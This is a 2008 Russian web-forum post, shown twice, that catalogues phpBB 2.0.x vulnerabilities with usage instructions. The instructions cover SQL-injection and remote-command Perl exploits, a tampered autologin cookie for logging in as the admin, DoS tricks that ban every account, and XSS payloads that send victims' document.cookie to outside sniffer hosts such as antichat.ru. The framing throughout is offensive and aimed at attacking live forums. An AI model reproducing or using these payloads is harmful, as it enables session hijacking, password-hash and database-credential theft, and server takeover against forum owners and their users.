Форум для web мастеров - Devil Art - Показать сообщение отдельно

Devil · 03.02.2008, 14:13

BlackEvil, у второй версии огромное колиство уязвимостей, я могу привести некоторые
phpBB <= 2.0.4
Цель: просмотр содержимого файлов на сервере
Описание: Была выпущена в 2002. Данная версия почти не присутствует в сети.
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
Exploit: phpBB 2.0.4 Remote php File Include Exploit

phpBB <= 2.0.5
Цель: просмотр hash'a пароля
Описание: Выпущена в 2002. Также редкая версия.
Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в при обработке $topic_id. Возможно добавить 2 запрос, тем самым захватить хэш.
Exploit: phpBB 2.0.5 SQL Injection password disclosure Exploit
При запуске $remote = shift || 'localhost'; - изменяем на нужный например 255.255.255.255, $uid = shift || 2; - ID нужного нам пользователя. В форумах phpBB ID администратора по умолчанию "2". Затем пишем "perl exp.pl"
Video: -

phpBB <= 2.0.6
Цель: просмотр hash'a пароля
Описание: Выпущена в 2002. Также редкая версия.
Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в модуле search.php.
Exploit: phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Запускаем "perl exp.pl <server> <folder> <user_id> <search_id>"
Где <server> - ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "ping test.com"), <folder> - папка где находится сам форум (например если у нас http://123.123.123.123/forum/index.php, вместо <folder> пишем forum), <user_id> <search_id> - ID пользователя.
Video: http://video.antichat.net/videos/kez/phpbb_206_sql2.rar

phpBB <= 2.0.8
Цель: подмена ip
Описание: так себе
Описание уязвимости: позволяет подменить ip отправителя на произвольный
Exploit: Уведомление о безопасности: phpBB 2.0.8a and lower - IP spoofing vulnerability - ошибки и эксплоиты

phpBB 2.0.10
Пропустим версии с 7 по 9, т.к. в них присутствует те же уязвимости, что и в phpBB 2.0.10.
Цель: (1) Выполение произвольных команд.
Описание: Была выпущена так же в 2002. Данная версия встречается намного чаще, чем младшие. Но реже чем старшие =). Был произведён дефейс сайта phpbb.com, с помощью найденной уязвимости в этой версии.
Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php.
Exploit: phpBB <= 2.0.10 Remote Command Execution Exploit Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]"
Где [*URL] - урл сайта (например Test.com Web Based Testing Software), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix Форум АНТИЧАТ)
video: -

Цель: (2) Попадание в админку обходя ограничения.
Описание: -
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
Exploit: В архиве с видео =)
Video: http://video.antichat.net/videos/wizi/vhackbbshwizi.rar

phpBB <= 2.0.11
Цель: Выполение произвольных команд
Описание: Была выпущена так же в 2002.
Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php - горе-кодеры плохо запатчили предыдущую багу - фильтрация ковычки обходится как %2527
Exploit: http://www.site.ru/forum/viewtopic.php?t=2726&highlight=%2527.$poster=%60$v ar%60.%2527&var=id

phpBB <= 2.0.12
Цель: Вход на форум аккаунтом администратора.
Описание: -
Описание уязвимости: Для начала нам следует зарегаться на форуме. Затем, войти под своим аккаунтом и если стоит галка "Автоматический вход",то убрать её. Нам нужно отредактировать кукисы (посоветую делать это в опере Tools->Advanced->Cookies),
вместо

Код:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

X - наш ID ,
а меняем на

Код:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

2 - как уже говорилось выше, ID админа

Код:

"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"

Video: -

phpBB <= 2.0.13
Цель: просмотр hash'a пароля, любого пользователя
Описание: -
Описание уязвимости: Уязвимость присутствует в модуле downloads.php. Есть возможность SQL инъекции
Exploit: phpBB <= 2.0.13 'downloads.php' mod Remote Exploit
Запускать "perl exp.pl <site> <dir> <id>"
Где <site> URL сайта <dir> - директория <id> - нужный нам пользователь
Video: -

phpBB <= 2.0.15
Цель: получение Имя,Логина, Пароля от БД.
Описание: -
Описание уязвимости: Уязвимость пристутствует в модуле viewtopic.php.
Exploit: phpBB 2.0.15 (highlight) Database Authentication Details Exploit Запускать "perl exp.pl <server> <dir> <id> \r\n"
Где <server> - ip сервера, <dir> - директория в которой находится форум <id> номер существующего топика.
Video: -

phpBB <= 2.0.16
Цель: получение hash'a пароля пользователя
Описание: -
Описание уязвимости: В данной версии присутствует XSS (Cross Site Scripting более подробно про XSS можно почитать тут Cross-site Scripting Краткий обзор или XSS (Cross Site Scripting) Cheat Sheet), которая получить кукисы. Они высылаются на сниффер,
логи которого можно посмотреть здесь http://antichat.ru/sniff/log.php.
Exploit:

Код:

[*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th  is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]

Video: -

phpBB <= 2.0.16
Цель: 2.0.16 Installation Path Disclosure
Описание: -
Описание уязвимости: раскрытие данных

Код:

2.0.16 - Working Stuff. Here. Right now.

Video: -

phpBB <= 2.0.17
Цель: выполнение произвольных команд на сервере(php-inj)
Описание: -
Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.
http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl <URL> <cmd>"
Где <URL> - ссылка до форума например http://site.com/phpBB/, <cmd> - нужная команда (о командах читаем тут Форум АНТИЧАТ).
Video: -

phpbb <= 2.0.18
Цель: получение сессии админа
Описание: XSS в собщении
Описание уязвимости: требует включеных BB-тэгов или HTML на форуме
Exploit:

Код:

<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B "> H A L L O </B>

Код:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th  is.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='fon  t-size:0; X="<B ">'</B>

PHP код:

   [url]http://www.[url=http://wj.com/style=display:none;background:url(javascript:alert  ()) ]wj[/url][/url]

phpBB <= 2.0.18
Цель: получение hash'a пароля пользователя
Описание: найдена WJ (White Jordan =)
Описание уязвимости: В данной версии присутствует XSS.
Exploit:

Код:

[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"(")
Video: -

phpBB <= 2.0.18
Цель: подмена ника
Описание: найдена Dgoing
Описание уязвимости: подмена ника, обход бана
Exploit: Форум АНТИЧАТ - phpBB 2.0.18 (а так же UBB.threads™ 6.4.3) простейший хак
Video: -

phpbb <= 2.0.19
Цель: получение сессии админа
Описание: XSS в собщении
Описание уязвимости: требует включеных BB-тэгов или HTML на форуме
Exploit:

Код:

<B C='>' onmouseover='alert(document.location="http://antichat.ru"+document.cookie)' X='<B   '> antichat.ru </B>

PHP код:

   [url]http://www.[email=http://wj.com/style=display:none;background:url(javascript:alert  ()) ]wj[/email][/url][email=http://wj.com/style=display:none;background:url(javascript:alert  ()) ][/email]

phpbb <= 2.0.19
Цель: получение пароля админа
Описание: phpBB Style Changer\Viewer MOD SQL injection Exploit
Описание уязвимости: sql-inj уязвимость в index.php?s=[SQL] позволяет выполнить произвольный запрос в бд

Код:

 phpBB 2.0.19 (Style Changer/Demo Mod) SQL Injection Exploit

phpbb = 2.0.19
Цель: DoS форума
Описание: -
Описание уязвимости: Уязвимость позволяет забанить всех пользователей на форуме
[

Код:

url=http://forum.comp-info.ru/showthread.php?threadid=238]Уязвимость в phpbb 2.0.19 - ФОРУМ КОМП-ИНФО[/url]

phpbb <= 2.0.19
Цель: DoS форума
Описание: Neo Security Team (автор - HaCkZaTaN)
Описание уязвимости: Сплоит регистрирует неограниченное количество ников или делает через поиск запросы, которые база не может воспринять. Сплойт бессилен там, где надо вводить код (визуальное подтверждение) при регистрации

Код:

h4cky0u Under maintance -

phpbb <= 2.0.19
Цель: получение пароля админа
Описание: Уязвимость позволяет удаленному пользователю произвести брут-форс атаку.
Описание уязвимости: Уязвимость существует из-за того, что функция "gen_rand_string()" генерирует угадываемые случайные номера. Удаленный пользователь может изменить пароль к целевой учетной записи с помощью функционала восстановления пароля путем отправки большого количества запросов для подбора Validation ID (не более 1000000 запросов). Для удачной эксплуатации уязвимости злоумышленнику необходимо знать e-mail целевой учетной записи.
Exploit: phpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool (updated)

phpbb <= 2.0.20
Цель: DoS форума
Описание: банит все аккаунты
Описание уязвимости: по умолчанию в форуме включен бан аккаунта при более 5 неудачных попыток входа
Exploit: phpBB 2.0.20 Disable Admin or User Account
Video: -

phpBB <= 2.0.21
Цель: компрометация сервера
Описание: obviously you have no output, but this makes phpbb to be like a http proxy
Описание уязвимости: а в переводе - phpbb можно использовать как прокси, посылая запрос в удаленном урле аватара; также форум не проверяет контент загружаемых аватарах в EXIF тэгах, туда мона поместить PHP-код и потом какнить приинклудить. Вот.

Код:

SecurityFocus

phpBB <= 2.0.21
Цель: получение сессии админа
Описание: XSS нападение и CSRF атака
Описание уязвимости: 1)Уязвимость существует из-за того, что приложение не проверяет валидность HTTP запроса при отправке сообщений. 2) Уязвимость существует из-за недостаточной обработки входных данных в поле "Message body" в сценарии privmsg.php.
Межсайтовый скриптинг в phpBB - SecurityLab
Вся инфрмация взято с форума Античат, вот из этой темы
Форум АНТИЧАТ - [Обзор уязвимостей phpBB]
Смею заметить это далеко не полный перечень уязвимостей.

03.02.2008, 14:13	#7 (permalink)
Devil Администратор Специализация: Кодер Регистрация: 05.12.2007 Адрес: Москва Сообщений: 2,933 Репутация: 1292 599613 Отблагодарить разработчика	BlackEvil, у второй версии огромное колиство уязвимостей, я могу привести некоторые phpBB <= 2.0.4 Цель: просмотр содержимого файлов на сервере Описание: Была выпущена в 2002. Данная версия почти не присутствует в сети. Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP. Exploit: phpBB 2.0.4 Remote php File Include Exploit phpBB <= 2.0.5 Цель: просмотр hash'a пароля Описание: Выпущена в 2002. Также редкая версия. Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в при обработке $topic_id. Возможно добавить 2 запрос, тем самым захватить хэш. Exploit: phpBB 2.0.5 SQL Injection password disclosure Exploit При запуске $remote = shift \|\| 'localhost'; - изменяем на нужный например 255.255.255.255, $uid = shift \|\| 2; - ID нужного нам пользователя. В форумах phpBB ID администратора по умолчанию "2". Затем пишем "perl exp.pl" Video: - phpBB <= 2.0.6 Цель: просмотр hash'a пароля Описание: Выпущена в 2002. Также редкая версия. Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в модуле search.php. Exploit: phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit Запускаем "perl exp.pl <server> <folder> <user_id> <search_id>" Где <server> - ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "ping test.com"), <folder> - папка где находится сам форум (например если у нас http://123.123.123.123/forum/index.php, вместо <folder> пишем forum), <user_id> <search_id> - ID пользователя. Video: http://video.antichat.net/videos/kez/phpbb_206_sql2.rar phpBB <= 2.0.8 Цель: подмена ip Описание: так себе Описание уязвимости: позволяет подменить ip отправителя на произвольный Exploit: Уведомление о безопасности: phpBB 2.0.8a and lower - IP spoofing vulnerability - ошибки и эксплоиты phpBB 2.0.10 Пропустим версии с 7 по 9, т.к. в них присутствует те же уязвимости, что и в phpBB 2.0.10. Цель: (1) Выполение произвольных команд. Описание: Была выпущена так же в 2002. Данная версия встречается намного чаще, чем младшие. Но реже чем старшие =). Был произведён дефейс сайта phpbb.com, с помощью найденной уязвимости в этой версии. Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php. Exploit: phpBB <= 2.0.10 Remote Command Execution Exploit Запускать "perl exp.pl [URL] [DIR] [NUM] [CMD]" Где [URL] - урл сайта (например Test.com Web Based Testing Software), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд nix Форум АНТИЧАТ) video: - Цель: (2) Попадание в админку обходя ограничения. Описание: - Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP. Exploit: В архиве с видео =) Video: http://video.antichat.net/videos/wizi/vhackbbshwizi.rar phpBB <= 2.0.11 Цель: Выполение произвольных команд Описание: Была выпущена так же в 2002. Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php - горе-кодеры плохо запатчили предыдущую багу - фильтрация ковычки обходится как %2527 Exploit: http://www.site.ru/forum/viewtopic.php?t=2726&highlight=%2527.$poster=%60$v ar%60.%2527&var=id phpBB <= 2.0.12 Цель: Вход на форум аккаунтом администратора. Описание: - Описание уязвимости: Для начала нам следует зарегаться на форуме. Затем, войти под своим аккаунтом и если стоит галка "Автоматический вход",то убрать её. Нам нужно отредактировать кукисы (посоветую делать это в опере Tools->Advanced->Cookies), вместо Код: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D X - наш ID , а меняем на Код: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D 2 - как уже говорилось выше, ID админа Код: "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D" Video: - phpBB <= 2.0.13 Цель: просмотр hash'a пароля, любого пользователя Описание: - Описание уязвимости: Уязвимость присутствует в модуле downloads.php. Есть возможность SQL инъекции Exploit: phpBB <= 2.0.13 'downloads.php' mod Remote Exploit Запускать "perl exp.pl <site> <dir> <id>" Где <site> URL сайта <dir> - директория <id> - нужный нам пользователь Video: - phpBB <= 2.0.15 Цель: получение Имя,Логина, Пароля от БД. Описание: - Описание уязвимости: Уязвимость пристутствует в модуле viewtopic.php. Exploit: phpBB 2.0.15 (highlight) Database Authentication Details Exploit Запускать "perl exp.pl <server> <dir> <id> \r\n" Где <server> - ip сервера, <dir> - директория в которой находится форум <id> номер существующего топика. Video: - phpBB <= 2.0.16 Цель: получение hash'a пароля пользователя Описание: - Описание уязвимости: В данной версии присутствует XSS (Cross Site Scripting более подробно про XSS можно почитать тут Cross-site Scripting Краткий обзор или XSS (Cross Site Scripting) Cheat Sheet), которая получить кукисы. Они высылаются на сниффер, логи которого можно посмотреть здесь http://antichat.ru/sniff/log.php. Exploit: Код: [url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new//Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url] Video: - phpBB <= 2.0.16 Цель: 2.0.16 Installation Path Disclosure Описание: - Описание уязвимости: раскрытие данных Код: 2.0.16 - Working Stuff. Here. Right now. Video: - phpBB <= 2.0.17 Цель: выполнение произвольных команд на сервере(php-inj) Описание: - Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php. http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl <URL> <cmd>" Где <URL> - ссылка до форума например http://site.com/phpBB/, <cmd> - нужная команда (о командах читаем тут Форум АНТИЧАТ). Video: - phpbb <= 2.0.18 Цель: получение сессии админа Описание: XSS в собщении Описание уязвимости: требует включеных BB-тэгов или HTML на форуме Exploit: Код: <B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B "> H A L L O </B> Код: <B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new//Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='fon t-size:0; X="<B ">'</B> PHP код: `[url]http://www.[url=http://wj.com/style=display:none;background:url(javascript:alert ()) ]wj[/url][/url]` phpBB <= 2.0.18 Цель: получение hash'a пароля пользователя Описание: найдена WJ (White Jordan =) Описание уязвимости: В данной версии присутствует XSS. Exploit: Код: [URL]http://www.[URL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/URL][/*URL] Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"(") Video: - phpBB <= 2.0.18 Цель: подмена ника Описание: найдена Dgoing Описание уязвимости: подмена ника, обход бана Exploit: Форум АНТИЧАТ - phpBB 2.0.18 (а так же UBB.threads™ 6.4.3) простейший хак Video: - phpbb <= 2.0.19 Цель: получение сессии админа Описание: XSS в собщении Описание уязвимости: требует включеных BB-тэгов или HTML на форуме Exploit: Код: <B C='>' onmouseover='alert(document.location="http://antichat.ru"+document.cookie)' X='<B '> antichat.ru </B> PHP код: `[url]http://www.[email=http://wj.com/style=display:none;background:url(javascript:alert ()) ]wj[/email][/url][email=http://wj.com/style=display:none;background:url(javascript:alert ()) ][/email]` phpbb <= 2.0.19 Цель: получение пароля админа Описание: phpBB Style Changer\Viewer MOD SQL injection Exploit Описание уязвимости: sql-inj уязвимость в index.php?s=[SQL] позволяет выполнить произвольный запрос в бд Код: phpBB 2.0.19 (Style Changer/Demo Mod) SQL Injection Exploit phpbb = 2.0.19 Цель: DoS форума Описание: - Описание уязвимости: Уязвимость позволяет забанить всех пользователей на форуме [ Код: url=http://forum.comp-info.ru/showthread.php?threadid=238]Уязвимость в phpbb 2.0.19 - ФОРУМ КОМП-ИНФО[/url] phpbb <= 2.0.19 Цель: DoS форума Описание: Neo Security Team (автор - HaCkZaTaN) Описание уязвимости: Сплоит регистрирует неограниченное количество ников или делает через поиск запросы, которые база не может воспринять. Сплойт бессилен там, где надо вводить код (визуальное подтверждение) при регистрации Код: h4cky0u Under maintance - phpbb <= 2.0.19 Цель: получение пароля админа Описание: Уязвимость позволяет удаленному пользователю произвести брут-форс атаку. Описание уязвимости: Уязвимость существует из-за того, что функция "gen_rand_string()" генерирует угадываемые случайные номера. Удаленный пользователь может изменить пароль к целевой учетной записи с помощью функционала восстановления пароля путем отправки большого количества запросов для подбора Validation ID (не более 1000000 запросов). Для удачной эксплуатации уязвимости злоумышленнику необходимо знать e-mail целевой учетной записи. Exploit: phpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool (updated) phpbb <= 2.0.20 Цель: DoS форума Описание: банит все аккаунты Описание уязвимости: по умолчанию в форуме включен бан аккаунта при более 5 неудачных попыток входа Exploit: phpBB 2.0.20 Disable Admin or User Account Video: - phpBB <= 2.0.21 Цель: компрометация сервера Описание: obviously you have no output, but this makes phpbb to be like a http proxy Описание уязвимости: а в переводе - phpbb можно использовать как прокси, посылая запрос в удаленном урле аватара; также форум не проверяет контент загружаемых аватарах в EXIF тэгах, туда мона поместить PHP-код и потом какнить приинклудить. Вот. Код: SecurityFocus phpBB <= 2.0.21 Цель: получение сессии админа Описание: XSS нападение и CSRF атака Описание уязвимости: 1)Уязвимость существует из-за того, что приложение не проверяет валидность HTTP запроса при отправке сообщений. 2) Уязвимость существует из-за недостаточной обработки входных данных в поле "Message body" в сценарии privmsg.php. Межсайтовый скриптинг в phpBB - SecurityLab Вся инфрмация взято с форума Античат, вот из этой темы Форум АНТИЧАТ - [Обзор уязвимостей phpBB] Смею заметить это далеко не полный перечень уязвимостей. __________________ Мы те, кто мы есть Мой личный блог